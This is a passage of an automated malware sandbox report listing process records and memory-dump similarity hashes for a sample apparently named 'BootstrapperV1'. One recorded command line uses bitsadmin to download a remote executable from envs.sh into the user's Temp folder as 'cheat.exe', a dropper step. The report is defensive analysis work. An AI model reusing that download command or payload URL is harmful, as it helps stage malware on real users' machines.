                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:06:22:21
                                            Start date:16/09/2024
                                            Path:C:\Windows\SysWOW64\bitsadmin.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
                                            Imagebase:0x910000
                                            File size:186'880 bytes
                                            MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:5
                                            Start time:06:22:21
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:6
                                            Start time:06:22:22
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff6eef20000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:12
                                            Start time:06:22:31
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\WerFault.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184
                                            Imagebase:0x7ff6cdd30000
                                            File size:570'736 bytes
                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Reset < >
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bbc82da200f5fa8d83bb06683c454ad80a40ebaf52bdb904ca0ea6b674e9c34
                                              • Instruction ID: ffd6e2e3f1851d53945567bfd716df98681ebfe071ba236b865ce1929cee6cfc
                                              • Opcode Fuzzy Hash: 6bbc82da200f5fa8d83bb06683c454ad80a40ebaf52bdb904ca0ea6b674e9c34
                                              • Instruction Fuzzy Hash: 8431B621B0DA8D4FDB95EB6C88A96B97BF1EF9A201B0500BBE44DC32F7DD645C058701
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf8cc2b3ef23a7e5514cb7170667778873baabd7d5a8d8b85da29c6f0e49d0cf
                                              • Instruction ID: ac8a1b7b0be669ce2e7eba528996f67739da51ca60b9665950ed1a2e9c4424a7
                                              • Opcode Fuzzy Hash: cf8cc2b3ef23a7e5514cb7170667778873baabd7d5a8d8b85da29c6f0e49d0cf
                                              • Instruction Fuzzy Hash: E0716030B1990D8FDB98EB68C4A8BAD77E2FF54314F114669E05AD32E5DF38A941CB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1cf5be5e957d35481039283036ae1669161dc079dfbabc62700128296339eaae
                                              • Instruction ID: ebf2b7416ac586d1c0025e84d725ee2dd6287f989c272b682055ee2a7a632d7b
                                              • Opcode Fuzzy Hash: 1cf5be5e957d35481039283036ae1669161dc079dfbabc62700128296339eaae
                                              • Instruction Fuzzy Hash: 8F31666284E3CA5FC7539BB04C764A17FB09E5722070A41EBD4C4CB4B3D50C6A9AC762
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f8e511be354ce52a4a793b5d00493ee32540c7c9922834e924687589ed622eb
                                              • Instruction ID: 1b9ae05e87892635cb02acf6cf94b55dee12b652363e9028703cddf8970bf328
                                              • Opcode Fuzzy Hash: 6f8e511be354ce52a4a793b5d00493ee32540c7c9922834e924687589ed622eb
                                              • Instruction Fuzzy Hash: 0D21A731B0894D4FDB94FF6C88A96B9B7D2EF98305B44017BE40ED32A7DE6468418740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59ac4ae9b70a0856e06b9c622ca81b9e48baa73ece2dfac00b93ed456226fbe5
                                              • Instruction ID: 42ac35b44ddeb5f7bc7db51e0452ae1a38f447753853494eb7ce2f592a8c4c50
                                              • Opcode Fuzzy Hash: 59ac4ae9b70a0856e06b9c622ca81b9e48baa73ece2dfac00b93ed456226fbe5
                                              • Instruction Fuzzy Hash: EB115C11F0F68D1FE361FBB858659B477909F55224B0602B6D089C71B7DD1CB5428341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ffc1e318cfb37662cf80ae95ec416686b7b3ba1c728836d4294a2212617bd72
                                              • Instruction ID: 8de034f7244f3af4c0e68398ef984a8637a0f9ce48f3adaed536c3c85812c854
                                              • Opcode Fuzzy Hash: 4ffc1e318cfb37662cf80ae95ec416686b7b3ba1c728836d4294a2212617bd72
                                              • Instruction Fuzzy Hash: 9311E371D1574C4FEB54DFA8C4556DD7BF0EF58314F11426AD080A32A2DB35A9428B40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf8354c46f81cd8a5737985a3a3ec3a278a8441837c95493dc18ad60aed68c67
                                              • Instruction ID: 3702c0208755a46ea05c9c5231925090688ccdb242d7f0e6af62ac229c50dbbe
                                              • Opcode Fuzzy Hash: bf8354c46f81cd8a5737985a3a3ec3a278a8441837c95493dc18ad60aed68c67
                                              • Instruction Fuzzy Hash: 50014430B1E78D4FD7D4F76898A15A573D1EF58314B510175C449C72D5EE2CB8414741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63c5f8e8a0cb0ae0ca2de90a0329c27d3e63de9c09a0c38969ab7e99f657d78e
                                              • Instruction ID: 0133f0f8c89b98e1eec72fbe5818d0514da637502d5e1f262c8c8b25a5151d1f
                                              • Opcode Fuzzy Hash: 63c5f8e8a0cb0ae0ca2de90a0329c27d3e63de9c09a0c38969ab7e99f657d78e
                                              • Instruction Fuzzy Hash: AFF02830B19A5D4FD7A4F62898A1A7973D1EB8C718B500279D44EC3399EE2CB9424782
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0306ce53f7d8c778765cfb00a53780e682302651a24bf4ef8cab29b0d51dd985
                                              • Instruction ID: 407b5695fca707551c67bac7b013cabc8ce35a53b7f61d2d9ce3820e2d929cea
                                              • Opcode Fuzzy Hash: 0306ce53f7d8c778765cfb00a53780e682302651a24bf4ef8cab29b0d51dd985
                                              • Instruction Fuzzy Hash: AEF02820B1E65E4BD7A4F67C98A29B973D1EF88318F600275D48EC32DADD2CB9418781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1876647373.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b700000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc667d7f3aaa1bec1ffb63599f428cd4835ab305e61bbf530723f94b94297997
                                              • Instruction ID: b9278f2056d756150b2d2fc42d97ba404f964f3cdf2093e6a323fa4b1b0658b4
                                              • Opcode Fuzzy Hash: cc667d7f3aaa1bec1ffb63599f428cd4835ab305e61bbf530723f94b94297997
                                              • Instruction Fuzzy Hash: 8CE08602F5D90D4BEB9879BC28A66F873C5DB99624F810136F05DC22DAEC199C825342
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4K_^
                                              • API String ID: 0-2469588899
                                              • Opcode ID: f4419985340e0e483fe3df7de305766b4e026c6c8d4f203d99e7e43b750eb504
                                              • Instruction ID: 1471210ce352ce4ffd647984b200c598eba767c03481539dbcad88debc839768
                                              • Opcode Fuzzy Hash: f4419985340e0e483fe3df7de305766b4e026c6c8d4f203d99e7e43b750eb504
                                              • Instruction Fuzzy Hash: D5D14A32A0D7584FDB25EB6CA8A69F97BF0EF44315B0502BBD0C9CB1A3DD14A906C781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4K_^
                                              • API String ID: 0-2469588899
                                              • Opcode ID: 4f3bd29e2f072e8508f236e34b13d979c5ea420d2f46b9338c7988761667614b
                                              • Instruction ID: 4ee7010e18b97b72cb10ea390f446cae4b439aa7b63c9d08af80ee8cd7bd77af
                                              • Opcode Fuzzy Hash: 4f3bd29e2f072e8508f236e34b13d979c5ea420d2f46b9338c7988761667614b
                                              • Instruction Fuzzy Hash: D0D15A32A0D7584FDB25EB7CA8A69E97BF0EF45714B0502BBD0C9CB1A3DD14A906C781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4K_^
                                              • API String ID: 0-2469588899
                                              • Opcode ID: f8c6a1e4a88c263929a88cdef4b3d3ff426c79cd940c46b644bc4064206a7282
                                              • Instruction ID: c50143628b9e99e2db47219394b4b2fbaf9149904eab629b328111bb2f5dc3a5
                                              • Opcode Fuzzy Hash: f8c6a1e4a88c263929a88cdef4b3d3ff426c79cd940c46b644bc4064206a7282
                                              • Instruction Fuzzy Hash: 1BC15A31A0D7584FDB15EB6CA8A69F97BF0EF45714B0502BBD0CACB1A3DD14A905C781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4K_^
                                              • API String ID: 0-2469588899
                                              • Opcode ID: 1b6984a7513a33edc375d1cc1b295f5af99e6731b0d4794f3f570bcfe428728f
                                              • Instruction ID: eff5d9c109a6ed8d662042fe15d379d6aaf3d879d2485168c8f108a88be56653
                                              • Opcode Fuzzy Hash: 1b6984a7513a33edc375d1cc1b295f5af99e6731b0d4794f3f570bcfe428728f
                                              • Instruction Fuzzy Hash: E4C18A32A0D7584FDB15EB6CA8A69E97BF0EF45714B0502BBD0CACB1A3DD10A906C781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64d4a0482e04a7e8c60c90506796d4e046f96ec89ad29db93c03664064a10b5d
                                              • Instruction ID: 4205f58f23c1beede92e774dad1546b3f23946ca7c764f0726a4cee619a7da65
                                              • Opcode Fuzzy Hash: 64d4a0482e04a7e8c60c90506796d4e046f96ec89ad29db93c03664064a10b5d
                                              • Instruction Fuzzy Hash: 0A628230B09A4D9FDB98EF1CC865AA937E2FF69354F0602B9E44DD72A1CE24E941C741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f6315b44df50b433481bf5364c532eb4393f350ff7dee4557fcecc74a954f1f
                                              • Instruction ID: a2370c8151a9c0899e494e161165365942e1a5d3683730ba8a33a2dbe59bec96
                                              • Opcode Fuzzy Hash: 4f6315b44df50b433481bf5364c532eb4393f350ff7dee4557fcecc74a954f1f
                                              • Instruction Fuzzy Hash: 9922057161DB898FD369CF7880947A2BBE1FFA5300F0586AED08A872B2DE24E545C751
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 773a6d67fffb2dbc7729ec93d943d1d39928f075b2b4f31da0fd298a630ef2dd
                                              • Instruction ID: 643122447de05779a7a2d031204524b4a32bf7e4434ea88eca61ccb08794f927
                                              • Opcode Fuzzy Hash: 773a6d67fffb2dbc7729ec93d943d1d39928f075b2b4f31da0fd298a630ef2dd
                                              • Instruction Fuzzy Hash: D8F13731B0DB494FE7659B288464AF67BE1EF91310F0542BAD0CECB5E7CE28A945C781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A$E$d
                                              • API String ID: 0-1099412801
                                              • Opcode ID: 480490704706ac2331295bdf1fe74e281a2c6ee6ca0c0c1ba128e201fbbe98e8
                                              • Instruction ID: be0395aec917076e66b7fcfba78bfd8d66dac670e3b3abab1ae6ba4ec08f2241
                                              • Opcode Fuzzy Hash: 480490704706ac2331295bdf1fe74e281a2c6ee6ca0c0c1ba128e201fbbe98e8
                                              • Instruction Fuzzy Hash: 99C13230B1DB4A4FE769DB188860935B7E1FF99304B1546BED08AC71B6DE35F9028781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: W$c
                                              • API String ID: 0-3017879651
                                              • Opcode ID: e017970e525dd3b8c8c3b7b52d0aed266e7b8e963a0bae45e05aff90d3fd9763
                                              • Instruction ID: 4c3255033a69296d091d3e51bd47a44b0fe7bf84b65fd2157ef22b30d0574d9b
                                              • Opcode Fuzzy Hash: e017970e525dd3b8c8c3b7b52d0aed266e7b8e963a0bae45e05aff90d3fd9763
                                              • Instruction Fuzzy Hash: 6E323931B0E78E5FE774DB6888616B577E1EF49310F0603BAD48DC72B2DA286D468781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: uK_H$zK_H
                                              • API String ID: 0-393510644
                                              • Opcode ID: 38a3c63c553de361865092b06abb3aba8db6e3e37d9e1dcca9de892c21208fe7
                                              • Instruction ID: 7fb9b99e36de7cd24755a01b7213bdb783cab3588d24281f55cd607f020b9075
                                              • Opcode Fuzzy Hash: 38a3c63c553de361865092b06abb3aba8db6e3e37d9e1dcca9de892c21208fe7
                                              • Instruction Fuzzy Hash: 9112C471B09A4D4FDBA4EB6C8465AB937D2EF99300F4501B9D09DC72F6DD24AC42C340
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PK_^$QK_^
                                              • API String ID: 0-2306524656
                                              • Opcode ID: 64c0f0e13ef73a7670d5b9b234244eb0d6b4006a9754e85b2ae13b48819ed729
                                              • Instruction ID: 0a0ede5540fa05bac515737dcfbbd102374e649d5d045fffebd89578cfcb748b
                                              • Opcode Fuzzy Hash: 64c0f0e13ef73a7670d5b9b234244eb0d6b4006a9754e85b2ae13b48819ed729
                                              • Instruction Fuzzy Hash: 67C15A27B0D6560AE314B7BCB8B58EA7760EF8133E75943B7D1DD8D0E7DC0866468290
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d$3<L_^
                                              • API String ID: 0-1510923135
                                              • Opcode ID: 51bd6d715c331e2e44758050399ca80529dc8df99a9353edb7d5dea31e4121b2
                                              • Instruction ID: f6b5eddb92fc807cc7408a22fa39209599ce45d435ef63987d631d718a478e81
                                              • Opcode Fuzzy Hash: 51bd6d715c331e2e44758050399ca80529dc8df99a9353edb7d5dea31e4121b2
                                              • Instruction Fuzzy Hash: ABC11330B0DB4A4FE769DB588461575B7E1FFA9300B1607BED0CAC71B6DA29F9028741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A$d
                                              • API String ID: 0-892238338
                                              • Opcode ID: 2497660fb4613d8503d5d95b3af9bc18c80027df8fe4303c36168a06568a7234
                                              • Instruction ID: 835956253c4ea5f216c7aabe3d43641b88c0b5f85b8696f00cb82ba00e66942f
                                              • Opcode Fuzzy Hash: 2497660fb4613d8503d5d95b3af9bc18c80027df8fe4303c36168a06568a7234
                                              • Instruction Fuzzy Hash: 78C1FF30A1DB494FD768DB58C4A1935B3E1FF99304B114A7ED08AC36A6DE35F942CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A$d
                                              • API String ID: 0-892238338
                                              • Opcode ID: d09a7326c7a4d180c584e2e280dfb279d5fc7af91a4420febb362e110c361915
                                              • Instruction ID: 4c62446a36bd9dbf399cb86e2e7dbbaec7dc21f663edc9345364b462f3ecf3f8
                                              • Opcode Fuzzy Hash: d09a7326c7a4d180c584e2e280dfb279d5fc7af91a4420febb362e110c361915
                                              • Instruction Fuzzy Hash: AFB10030A18B094FD728EB5894649B6B3E1FF94318B15467ED08AC71A6DE35F942CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [`$[a
                                              • API String ID: 0-1202865014
                                              • Opcode ID: e06a0a638042781b2b44537868bf6e8bbea2b86bb476357a67e0d51b8046aba9
                                              • Instruction ID: 0eb897f182521a230aeba07ea761f1fa670c3458a7e1cee4862ce2f0b84f6c7e
                                              • Opcode Fuzzy Hash: e06a0a638042781b2b44537868bf6e8bbea2b86bb476357a67e0d51b8046aba9
                                              • Instruction Fuzzy Hash: 8641C321B1EF5E0FEAB9A6AC447467932D1EF99610B0602BBD08DC32B6DD19FD019380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [`$[a
                                              • API String ID: 0-1202865014
                                              • Opcode ID: 80bd96bdf84ffd57b7c9e81bf3421493e0214f59a35c0edf0427f8e9988dbe28
                                              • Instruction ID: 82d9cd643a95187ca0c041da8e05bea91779412cd35dd73f03a9f2bdabfce19c
                                              • Opcode Fuzzy Hash: 80bd96bdf84ffd57b7c9e81bf3421493e0214f59a35c0edf0427f8e9988dbe28
                                              • Instruction Fuzzy Hash: 6E31BF21B1EB0E0FE7A9A7AC54756B873D1EF49624B4502BBD08DC72B7DD19BD428380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \
                                              • API String ID: 0-2967466578
                                              • Opcode ID: fc7bb133fef2a4558c263983cc8c0b58a8e01d03995f22ba0a4468fd04179b03
                                              • Instruction ID: 1784eea6b2d0ec4b116b5ca0181dd9107b0b25bdef26c1c956a99f87cd6ced4a
                                              • Opcode Fuzzy Hash: fc7bb133fef2a4558c263983cc8c0b58a8e01d03995f22ba0a4468fd04179b03
                                              • Instruction Fuzzy Hash: C9422630B0DB494FEB68DA68C4A567577E1FF99300F0542BED49EC36B3DD28A9428781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: OC^L
                                              • API String ID: 0-3418216847
                                              • Opcode ID: 86e705e7a022eb1710a43cb5e551d984458e8488b90c152b9c620b41ccb80e2f
                                              • Instruction ID: e5600c1654fea9e141c8f463a936aef30449c270bd68b97d907412c81659e208
                                              • Opcode Fuzzy Hash: 86e705e7a022eb1710a43cb5e551d984458e8488b90c152b9c620b41ccb80e2f
                                              • Instruction Fuzzy Hash: 3C22D220B0DA894FE759A7A85469BB97BE1EF55200F5501FAD08EC72F3DD18AE428342
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: zK_H
                                              • API String ID: 0-472741372
                                              • Opcode ID: 9c0681ca5806d94d571f8594a07659976fbac6437ebf7e77b059c16c8a4d10a4
                                              • Instruction ID: 82d0320a65483c3b0e78a368e064854f221aa48df9d0ea588c2f2888cbfb67b2
                                              • Opcode Fuzzy Hash: 9c0681ca5806d94d571f8594a07659976fbac6437ebf7e77b059c16c8a4d10a4
                                              • Instruction Fuzzy Hash: F302D520B0DB4D4FEB95EB5C8464BA5B7E1EF59310F1642EAC08DC71B2CA25AC82C741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: db26104b882932f22588ee96952d1aef1fd90b919e9ebebb8a60a257f8be35b1
                                              • Instruction ID: cbbd434a72d4b8185085116710db4a4cf24b6fef9cbbe307258ce269e080c9c2
                                              • Opcode Fuzzy Hash: db26104b882932f22588ee96952d1aef1fd90b919e9ebebb8a60a257f8be35b1
                                              • Instruction Fuzzy Hash: 1ED13230B1CB094FD728EB6CD451AB5B3E0EF95314B1446BED08A872A6CE31F8438B91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 3f1f5f2b6a748e7caa70418007d804cfeb39beaf8004a9e985e21d9f8ba40f8f
                                              • Instruction ID: 1f7f86b3cba0efe72ba4578331e6c60b3150f2b1b0024a9b3f85a071bd39f918
                                              • Opcode Fuzzy Hash: 3f1f5f2b6a748e7caa70418007d804cfeb39beaf8004a9e985e21d9f8ba40f8f
                                              • Instruction Fuzzy Hash: 11C10E30B1DB498FD768DB58D451935B3E1FF98300B154ABED0CAC36A6DA35F9428781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: I
                                              • API String ID: 0-3707901625
